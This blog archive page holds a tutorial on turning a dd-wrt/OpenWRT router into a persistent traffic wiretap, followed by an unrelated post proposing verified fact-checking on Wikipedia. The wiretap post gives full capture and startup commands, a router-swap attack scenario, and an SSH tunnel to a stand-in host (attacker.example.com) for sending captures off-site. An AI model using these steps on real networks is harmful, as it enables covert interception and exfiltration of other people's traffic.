Ideas Archives - InputOutput.io

Rooting a router: Wiretapping dd-wrt / OpenWRT embedded Linux firmware

Note: The following post is written partially as a follow-up to the presentation I gave on dd-wrt at the December meeting of the Western North Carolina Linux Users Group.

Concept

If you’re running dd-wrt as your router (or OpenWRT, or Tomato for that matter), you already know how powerful it can be. Capabilities such as boosting signal strength, interacting with dynamic DNS services, running a VPN server, and transitioning to IPv6 all come prepackaged in the standard edition, running on a mere 4MB of flash memory (and the micro edition runs on 2MB!). What I will show you is that, using features commonly bundled with dd-wrt, you can turn your router into a wiretap, regardless of your wireless security. I’ll be dealing specifically with dd-wrt v24-sp2, but you can also wiretap OpenWRT by following similar instructions.

The idea is this: you have a router sitting at a critical juncture in your network infrastructure. Packets are rapidly being routed in and out of its various interfaces. If we are dealing with a wireless router with security enabled, the router is an endpoint for that encryption, which means the packets are decrypted upon arrival, before being pushed through the wire. Additionally, the OpenWRT / dd-wrt communities have ported a wide array of Linux projects to the platform. Notably, they’ve ported tcpdump, the powerful command-line packet analyzer, and libpcap, the C/C++ library required for capturing network traffic. Run such a tool at the router level and your network is owned.

There’s a problem though – once we have a capture going, where do we store it? Most of these routers only have extremely limited flash storage space, usually barely enough for the embedded firmware alone. Even those that have more can only store perhaps a few moments of a heavy traffic capture. Where is all that data to go? Well, we’re in luck: dd-wrt has precompiled support for CIFS (also known as SMB), Microsoft’s network sharing protocol. If we’re able to mount a network share, and store our capture there, then we don’t have to worry about storage limitations. We can even install the packages necessary for the capture on the remote filesystem.

Implementation

Let’s start with a base install. We’ll need SSH access, so let’s load up the web interface and, under Services → Services, enable SSHd. The package manager OpenWRT uses is called ipkg, which is not available until we enable JFFS2 under Administration → Management. Next, create a CIFS share on the local machine. Here, our local machine’s IP is 192.168.1.2, and the network share is named “share.” SSH in as root, and issue the following commands to insert the CIFS module and mount the network share:

insmod /lib/modules/2.4.35/cifs.o
mount.cifs "\\\\192.168.1.2\\share" /jffs -o user=username,password=password
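If both commands return silently, the share should now be backing /jffs. A quick sanity check — a sketch assuming the BusyBox mount, df, and lsmod applets are present, as they are on stock dd-wrt builds:

```shell
# Confirm the CIFS module actually loaded
lsmod | grep cifs

# Confirm the share is mounted over /jffs and see how much space it gives us
mount | grep /jffs
df -h /jffs
```

If the grep output is empty, the insmod or mount.cifs step failed and nothing below will work, so it is worth checking here before proceeding.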

Nice, now we have the network share mounted. If you encounter an error issuing the mount.cifs command, double-check your IP, share name, username, and password. Since we’ve essentially mounted over the already mounted /jffs, we need to issue an additional command for ipkg to update cleanly:

mkdir -p /jffs/tmp/ipkg
ipkg update

Once ipkg has updated its package list, we can see all that is available to us by issuing:

ipkg list

As you can see, there’s a ton of stuff we can install. At this point, though, I started encountering some problems. When I issued “ipkg install tcpdump”, it fetched and installed the required libpcap first. Then it went to install tcpdump and threw an error that libpcap wasn’t installed. Installing the packages manually didn’t work either, so I started looking for alternatives. Optware is another way to install packages, using its own ipkg in /opt rather than /jffs. Following the instructions here, I created an ext2 filesystem image on the local machine, available via the network share:

dd if=/dev/zero of=share/optware.ext2 bs=1 count=1 seek=10M
mkfs.ext2 share/optware.ext2

If you want more space for packages, change the seek parameter. Next, we’ll mount this image to /opt on the router side. We’ll need to install kmod-loop first, then insert the ext2 and loop kernel modules:

ipkg install kmod-loop
insmod /lib/modules/2.4.35/ext2.o
insmod /jffs/lib/modules/2.4.30/loop.o
mount -o loop /jffs/optware.ext2 /opt

Great, now we have /opt mounted to the remote ext2 filesystem. Get the install script and install it:

wget http://www.3iii.dk/linux/optware/optware-install-ddwrt.sh -O - | tr -d '\r' > /tmp/optware-install.sh
sh /tmp/optware-install.sh

Excellent, now we have the Optware port installed on /opt! Let’s run an update on this second ipkg:

/opt/bin/ipkg update

For comparison’s sake, let’s look at how many packages are now available, compared to before:

root@DD-WRT:/opt# ipkg list | wc -l
652
root@DD-WRT:/opt# /opt/bin/ipkg list | wc -l
1242

So we’ve almost doubled the number of packages available to us. And most importantly, no more complications with tcpdump:

/opt/bin/ipkg install tcpdump

Now that we have tcpdump and libpcap, we can dump our packets to the network share. The “not host 192.168.1.2” filter excludes traffic to and from the share itself, so we don’t end up capturing our own capture:

tcpdump -s 0 -w /jffs/network.cap not host 192.168.1.2

From here on, we can open the packet dump with Wireshark and find lots of useful information. We can even store the commands in a start-up script in the dd-wrt web interface under Administration → Commands:

insmod /lib/modules/2.4.35/cifs.o
insmod /lib/modules/2.4.35/ext2.o
mount.cifs "\\\\192.168.1.2\\share" /jffs -o user=username,password=password
insmod /jffs/lib/modules/2.4.30/loop.o
mount -o loop /jffs/optware.ext2 /opt
tcpdump -s 0 -w /jffs/network.cap not host 192.168.1.2 &
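Since the capture lands on the local machine’s share, it can be inspected there without touching the router again. A sketch, assuming Wireshark’s command-line tools (capinfos, tshark) are installed on the desktop and the share directory is ~/share (both names are assumptions for illustration):

```shell
# Summarize the capture: packet count, duration, data rates
capinfos ~/share/network.cap

# Pull out any cleartext HTTP requests -- source IP, host, and path
tshark -r ~/share/network.cap -Y http.request \
    -T fields -e ip.src -e http.host -e http.request.uri
```

Anything unencrypted on the wire — HTTP, FTP, POP3 — is fully readable here, which is the point of the whole exercise.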

Implications

Given the wide range of routers supported by dd-wrt/OpenWRT, this is a major security concern. Although the attack requires physical access to the device in question, there is nothing to stop an attacker from purchasing an identical model of router, installing dd-wrt and tcpdump on it, and swapping a target router with the malicious one. If the attacker already knows the wireless password, the malicious router can be configured so that the swap would not draw attention. Resetting the router is no defense – the OpenWRT firmware modification kit can easily modify the firmware image file, so adding code that monitors network traffic would mean any reset merely restores the malicious firmware.
Such an attack need not be local. Most ISPs block CIFS traffic, but the router could be made to forward the CIFS ports through an SSH tunnel to a remote endpoint. The stock Dropbear SSH isn’t capable of tunneling, but openssh is available in the ipkg repository, and can be either included in the firmware or installed in the local /jffs space. Sending all of the wire’s traffic to a remote endpoint may be impractical for an attacker, but packet headers alone still provide a wealth of information.
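The remote variant could be sketched like this — a hypothetical example, assuming openssh has been installed on the router as described above; the host name, account, and local port are all made up for illustration:

```shell
# On the router: forward local port 1445 through an SSH tunnel to the
# CIFS port (445) on a machine the attacker controls
# (attacker.example.com is a hypothetical host)
ssh -f -N -L 1445:127.0.0.1:445 user@attacker.example.com

# Mount the attacker's share through the tunnel instead of a LAN machine;
# mount.cifs accepts a port= option for the non-standard port
mount.cifs "\\\\127.0.0.1\\share" /jffs -o port=1445,user=username,password=password
```

From the ISP’s perspective this is just an outbound SSH connection, which sidesteps any CIFS port blocking.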

Wikiverify

The Problem:

Wikipedia is a great resource. In fact, it’s such a great resource that it’s the de facto source of information for – well – most things you want to know about. It’s so all-encompassing, so expansive and extensive, that you can find just about anything on it, from the frighteningly large rodent called the capybara to what exactly a “femme fatale” is to the intricate workings of the Rijndael encryption standard. Just a few years ago, you couldn’t find all this information in one place. After all, wikipedia.org as a domain was only registered in January 2001. A decade ago, you’d have to rely on the old textbooks, the infomercials that try to sell you the words of old white guys, to get even close to compiling the information that is accessible within a few keystrokes today. And the beautiful thing about it is that it’s all community driven. It’s not just a few old white guys anymore; it’s people from all across the globe collaborating on a masterpiece of information and accessibility. It’s an amorphous entity that is always growing, always changing, and constantly reshaping itself. It’s the closest thing we have to a real live Hitchhiker’s Guide to the Galaxy. Its democratic nature is great, but its unaccountable nature is where the whole thing gets tricky.

And that’s the real problem. People add stuff they’re not supposed to. Stupid stuff, silly stuff, misconceptions, inaccuracies, rumors, and downright lies. The entries get cluttered with things that don’t belong. I can’t claim I’m not guilty of it. I’ve edited Wikipedia entries in the past for kicks *cough*electromagneticpulse*cough* – but this just underlines the whole structural problem. Stephen Colbert, a personal hero of mine, caused havoc on Wikipedia in a single 10-minute segment by urging viewers to edit the “elephant” entry. The result was entry locks, warnings of bias, needed citations, and a general site-wide loss of credibility. People don’t trust Wikipedia the way they trust good ol’ fashioned ink and paper. It’s enough to cause nostalgia, a longing for the halcyon days when information was sparse, but at least it had some bite behind its bark. What’s an honest obscure-information-seeker to do? Where can we turn?

There is one solution, always turned to in times of despair. “Check your sources!” It’s the time-cherished response of every undergrad college professor you’ve ever had. “Wikipedia may not be cited, not now, not ever!” they cry out in unison. If I didn’t know any better, I’d say it was an affront to our information-sharing culture – a way to make the information they possess seem a precious commodity in light of the rubbish of our wikimedia commons. After all, are they not the arbiters of accuracy? Still, what they say does make sense: you have no way of distinguishing the trash from the treasure in any given entry. Someone may have edited it to add one of the aforementioned inaccuracies just 10 minutes ago. Hell, you may have edited it, just to get in the few extra footnotes you’ve been looking for and to get a chuckle out of quoting Cleopatra saying “I know kung fu.” So there has to be some greater source of authority to reference when trying to speak authoritatively yourself. You can’t just cite any odd article you like and expect it to be heeded like the wisdom of the ancients.

The Solution:

“But I’m so lazy!” you complain. “I don’t want to spider across twenty different newspapers, essays, and electronic journals just to quote something I already know as fact!” At this point a few months ago, I would have said “Well, too bad! Life is hard, suck it up! Get off, er, on your lethargic ass, do some fancy Google voodoo, and find that Australian PM quote you were looking for!” But in all honesty, the complaints do make sense. The information is out there, in all its cross-hyperlinked glory, but to get to it you have to spend inordinate amounts of time hunting it down from credible sources. Oh, pity me, I wish that Wikipedia had both the credibility I’m looking for and the vast resources it already has! If only there were a way to combine the best of both worlds!

But then I had this crazy idea. What if, instead of Wikipedia referring to sources of higher authority, Wikipedia brought those sources of higher authority to itself? What if Wikipedia set aside a corner of itself, however small it may initially be, and said “we swear by the hair on our chinny-chin-chin that this information is verifiably true”? Let’s call it verified.wikipedia.org. Now how would they verify the quality of content on this subdomain? Fact-checkers. That’s right – every major newspaper has them. They go around, looking at the articles about to go to print, and, well, check their facts, to make sure the quality of the article about to hit the newsstands lives up to the time-honored tradition of the Sun Times Press Journal Herald. And somehow, magically, this works. So bring fact-checkers to Wikipedia. Make them paid staff on the largest source of information of all time.

Sure, there are some logistical problems. For instance, Wikipedia is coming up with crazy schemes to make ends meet as it is – but no one claimed this would be easy. One possibility is getting the folks over at the Science Commons on board; that organization is certainly starting to address some of the problems of reliability and access to information. Another avenue is getting the universities themselves to fund such a project, and improve their public image besides. With enough of a starting nudge, we could even get professors and voices of authority to volunteer their words of wisdom. Wikipedia could become a platform for the collaboration of experts in various fields, pooling their knowledge into a central, open network.

The great thing about this is that there is really nothing to lose. If it doesn’t catch on, then oh well, we tried. No harm done. But if this does catch on, it could be something really interesting. As the saying goes, the sky is the limit.